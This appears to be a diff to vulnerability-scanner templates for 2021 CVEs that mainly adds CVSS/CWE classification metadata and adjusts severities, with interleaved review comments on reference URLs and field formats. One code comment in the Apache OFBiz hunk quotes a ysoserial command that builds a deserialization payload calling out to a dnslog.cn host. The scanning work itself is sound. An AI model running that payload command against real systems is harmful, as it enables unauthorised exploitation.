+++ b/cves/2021/CVE-2021-24495.yaml
@@ -9,6 +9,11 @@ info:
reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24495
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml
index 64eccc35f9..249ee3cb41 100644
--- a/cves/2021/CVE-2021-24498.yaml
+++ b/cves/2021/CVE-2021-24498.yaml
@@ -7,6 +7,11 @@ info:
severity: medium
tags: cve,cve2021,xss,wordpress,wp-plugin
reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24498
+ cwe-id: CWE-79
requests:
- raw:
diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml
index 9b24744f57..3636534b7b 100644
--- a/cves/2021/CVE-2021-25281.yaml
+++ b/cves/2021/CVE-2021-25281.yaml
@@ -7,6 +7,11 @@ info:
reference: http://hackdig.com/02/hack-283902.htm
description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
tags: cve,cve2021,saltapi,rce,saltstack
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-25281
+ cwe-id: CWE-287
requests:
- raw:
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index ca62a13683..6c596f1aad 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -3,12 +3,17 @@ id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu - severity: critical + severity: high reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 requests: - raw: diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 54134b92e1..223055583e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -11,6 +11,11 @@ info: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index d0462007ca..b1cf4c5442 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index cef67180f6..ab08b76304 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -13,6 +13,11 @@ info:
# Note:- This is detection template, To perform deserializes do as below
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-26295
+ cwe-id: CWE-502
requests:
- raw:
diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml
index bc9d4332f5..197a0e35f5 100644
--- a/cves/2021/CVE-2021-26475.yaml
+++ b/cves/2021/CVE-2021-26475.yaml
@@ -7,6 +7,11 @@ info:
reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
severity: medium
tags: cve,cve2021,xss,eprints
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-26475
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml
index ed5fc3662d..df2e680cab 100644
--- a/cves/2021/CVE-2021-26710.yaml
+++ b/cves/2021/CVE-2021-26710.yaml
@@ -7,6 +7,11 @@ info:
description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
reference: https://vict0ni.me/report2web-xss-frame-injection.html
tags: cve,cve2021,redwood,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-26710
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml
index 3b867adacd..72c53cc241 100644
--- a/cves/2021/CVE-2021-26722.yaml
+++ b/cves/2021/CVE-2021-26722.yaml
@@ -7,6 +7,11 @@ info:
description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar.
reference: https://github.com/linkedin/oncall/issues/341
tags: cve,cve2021,linkedin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-26722
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml
index 7358094f07..8372fc51ee 100644
--- a/cves/2021/CVE-2021-26723.yaml
+++ b/cves/2021/CVE-2021-26723.yaml
@@ -11,6 +11,11 @@ info:
- https://jenzabar.com/blog
- https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
tags: cve,cve2021,jenzabar,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-26723
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml
index 032841467b..e8d74a17dc 100644
--- a/cves/2021/CVE-2021-26812.yaml
+++ b/cves/2021/CVE-2021-26812.yaml
@@ -9,6 +9,11 @@ info:
reference:
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-26812
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
index 2b7a25ea5d..f2b5e87856 100644
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -12,6 +12,10 @@ info: - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26855 requests: - raw: diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0f16811c2a..5718543b60 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -3,9 +3,17 @@ id: CVE-2021-27132 info: name: CRLF Injection - Sercomm VD625 author: geeknik - severity: medium + severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27132 + cwe-id: CWE-74 + reference: + - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + - http://sercomm.com requests: - method: GET diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index b356cf909a..4f26fcca3a 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -7,6 +7,11 @@ info: description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-27330 + cwe-id: CWE-79 requests: - method: GET 
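Review bot: In the CVE-2021-27132 hunk the new `reference:` list adds `http://sercomm.com`, a plain-HTTP vendor homepage with no advisory path; it gives a reader nothing to verify the finding against and should be dropped or replaced with the vendor's actual advisory URL, leaving `- https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132` as the reference. The severity bump from medium to critical tracks the 9.80 vector, but for a CRLF injection in the Content-Disposition header, whose visible impact is response manipulation, the description should say why the score carries C:H/I:H/A:H (or note that it is NVD's verbatim rating), otherwise this template will be triaged alongside unauthenticated RCEs. The removed `- https://cybertuz.com/...` line sits between `description:` and `tags:` without a `reference:` key in view, so please confirm the old file had no second, now-orphaned reference entry; the rest of the info block is outside this hunk.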
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml
index 0b53b90095..0bd9968499 100644
--- a/cves/2021/CVE-2021-27651.yaml
+++ b/cves/2021/CVE-2021-27651.yaml
@@ -9,6 +9,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-27651
+ cwe-id: CWE-287,CWE-640
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml
index cba085815d..44b1b651c3 100644
--- a/cves/2021/CVE-2021-27850.yaml
+++ b/cves/2021/CVE-2021-27850.yaml
@@ -9,6 +9,11 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-27850
+ cwe-id: CWE-502
requests:
- raw:
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
index b14c3ad7df..7d28fe62e8 100644
--- a/cves/2021/CVE-2021-27905.yaml
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-27905
info:
name: Apache Solr <= 8.8.1 SSRF
author: hackergautam
- severity: medium
+ severity: critical
tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference:
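Review bot: `cwe-id: CWE-287,CWE-640` in the CVE-2021-27651 hunk packs two identifiers into one plain scalar, while every other hunk in this patch writes a single value; whether nuclei's classification loader splits that string on commas or stores it as one opaque id depends on the string-slice unmarshalling and is not something a template author should have to guess. Either confirm the loader splits it, or write it as a YAML sequence: `cwe-id:` followed by `  - CWE-287` and `  - CWE-640`. If comma-joined values are the intended convention, a one-line comment above the key saying so would spare the next author the same question.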
@@ -11,6 +11,11 @@ info:
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-27905
+ cwe-id: CWE-918
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml
index 33dd3f51b9..5529e9a825 100644
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -10,6 +10,11 @@ info:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149
tags: cve,cve2021,hongdian,traversal
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2021-28149
+ cwe-id: CWE-22
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml
index b16d0b19a0..0970614363 100644
--- a/cves/2021/CVE-2021-28150.yaml
+++ b/cves/2021/CVE-2021-28150.yaml
@@ -9,6 +9,11 @@ info:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
tags: cve,cve2021,hongdian,exposure
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.50
+ cve-id: CVE-2021-28150
+ cwe-id: CWE-20
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml
index 34b2b86083..60ffa8230b 100644
--- a/cves/2021/CVE-2021-28151.yaml
+++ b/cves/2021/CVE-2021-28151.yaml
@@ -10,6 +10,11 @@ info:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28151
tags: cve,cve2021,hongdian,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2021-28151
+ cwe-id: CWE-78
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml
index 40408c866b..35d226536b 100644
--- a/cves/2021/CVE-2021-28164.yaml
+++ b/cves/2021/CVE-2021-28164.yaml
@@ -10,6 +10,11 @@ info:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
- https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
tags: cve,cve2021,jetty
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2021-28164
+ cwe-id: CWE-200
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml
index e88a103bc6..2c4b5ba010 100644
--- a/cves/2021/CVE-2021-28169.yaml
+++ b/cves/2021/CVE-2021-28169.yaml
@@ -10,6 +10,11 @@ info:
description: |
For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory.
tags: cve,cve2021,jetty
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2021-28169
+ cwe-id: CWE-200
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml
index d591e23f66..ae168da091 100644
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -10,6 +10,11 @@ info:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.10
+ cve-id: CVE-2021-28918
+ cwe-id: CWE-20
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml
index 30132099ca..7c00cd061c 100644
--- a/cves/2021/CVE-2021-28937.yaml
+++ b/cves/2021/CVE-2021-28937.yaml
@@ -5,8 +5,13 @@ info:
author: geeknik
description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext.
reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990
- severity: medium
+ severity: high
tags: cve,cve2021,acexy,disclosure,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-28937
+ cwe-id: CWE-312
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml
index b92aededf1..976a0d7a51 100644
--- a/cves/2021/CVE-2021-29156.yaml
+++ b/cves/2021/CVE-2021-29156.yaml
@@ -7,6 +7,11 @@ info:
tags: cve,cve2021,openam
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-29156
+ cwe-id: CWE-74
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml
index 46e6805abe..4a1d38914d 100644
--- a/cves/2021/CVE-2021-29203.yaml
+++ b/cves/2021/CVE-2021-29203.yaml
@@ -8,6 +8,11 @@ info:
reference:
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-29203
+ cwe-id: CWE-287
requests:
- raw:
diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml
index ac947cde4f..87203f1c21 100644
--- a/cves/2021/CVE-2021-29441.yaml
+++ b/cves/2021/CVE-2021-29441.yaml
@@ -11,9 +11,14 @@ info: This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. author: dwisiswant0 - severity: high + severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 requests: - raw: diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml index 81a6d3fc5d..7b61103f73 100644 --- a/cves/2021/CVE-2021-29442.yaml +++ b/cves/2021/CVE-2021-29442.yaml @@ -10,6 +10,11 @@ info: severity: high reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 51791de0f0..c76ead0c70 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index ff5a0b4b8a..95b34e9478 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml 
@@ -7,6 +7,11 @@ info:
reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
severity: medium
tags: cve,cve2021,prometheus,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-29622
+ cwe-id: CWE-601
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml
index 26175c05d3..d5e3bd655d 100644
--- a/cves/2021/CVE-2021-29625.yaml
+++ b/cves/2021/CVE-2021-29625.yaml
@@ -9,6 +9,11 @@ info:
- https://sourceforge.net/p/adminer/bugs-and-features/797/
- https://www.cvedetails.com/cve/CVE-2021-29625/
tags: cve,cve2021,adminer,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-29625
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml
index 5b47b94607..c1251e9592 100644
--- a/cves/2021/CVE-2021-30151.yaml
+++ b/cves/2021/CVE-2021-30151.yaml
@@ -3,12 +3,17 @@ id: CVE-2021-30151
info:
name: CVE-2021-30151
author: DhiyaneshDk
- severity: low
+ severity: medium
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference:
- https://github.com/mperham/sidekiq/issues/4852
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
tags: cve,cve2021,xss,sidekiq
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-30151
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml
index 0168388bab..5a60c6d460 100644
--- a/cves/2021/CVE-2021-3017.yaml
+++ b/cves/2021/CVE-2021-3017.yaml
@@ -9,6 +9,10 @@ info:
- https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-3017
tags: cve,cve2021,exposure,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-3017
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml
index 67895708da..c642949eea 100644
--- a/cves/2021/CVE-2021-3019.yaml
+++ b/cves/2021/CVE-2021-3019.yaml
@@ -3,12 +3,17 @@ id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
- severity: medium
+ severity: high
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
reference:
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
tags: cve,cve2021,lanproxy,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-3019
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml
index 6de9e167ab..a5bbb3a5a1 100644
--- a/cves/2021/CVE-2021-30461.yaml
+++ b/cves/2021/CVE-2021-30461.yaml
@@ -7,6 +7,11 @@ info:
description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-30461
+ cwe-id: CWE-94
requests:
- raw:
diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml
index 64112f9e82..f25315a536 100644
--- a/cves/2021/CVE-2021-31249.yaml
+++ b/cves/2021/CVE-2021-31249.yaml
@@ -7,6 +7,10 @@ info:
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
severity: medium
tags: cve,cve2021,chiyu,crlf,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2021-31249
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml
index f03536d032..da104e45c7 100644
--- a/cves/2021/CVE-2021-31250.yaml
+++ b/cves/2021/CVE-2021-31250.yaml
@@ -7,6 +7,11 @@ info:
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
severity: medium
tags: cve,cve2021,chiyu,xss,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.40
+ cve-id: CVE-2021-31250
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml
index 8a0135ebcb..30d25808bb 100644
--- a/cves/2021/CVE-2021-3129.yaml
+++ b/cves/2021/CVE-2021-3129.yaml
@@ -9,6 +9,10 @@ info:
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-3129
requests:
- raw:
diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml
index 0e40527eea..10abaf9ffe 100644
--- a/cves/2021/CVE-2021-31537.yaml
+++ b/cves/2021/CVE-2021-31537.yaml
@@ -7,6 +7,11 @@ info:
reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
severity: medium
tags: cve,cve2021,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-31537
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml
index 4239a6763e..9da45f7140 100644
--- a/cves/2021/CVE-2021-31581.yaml
+++ b/cves/2021/CVE-2021-31581.yaml
@@ -8,6 +8,12 @@ info:
- https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
severity: medium
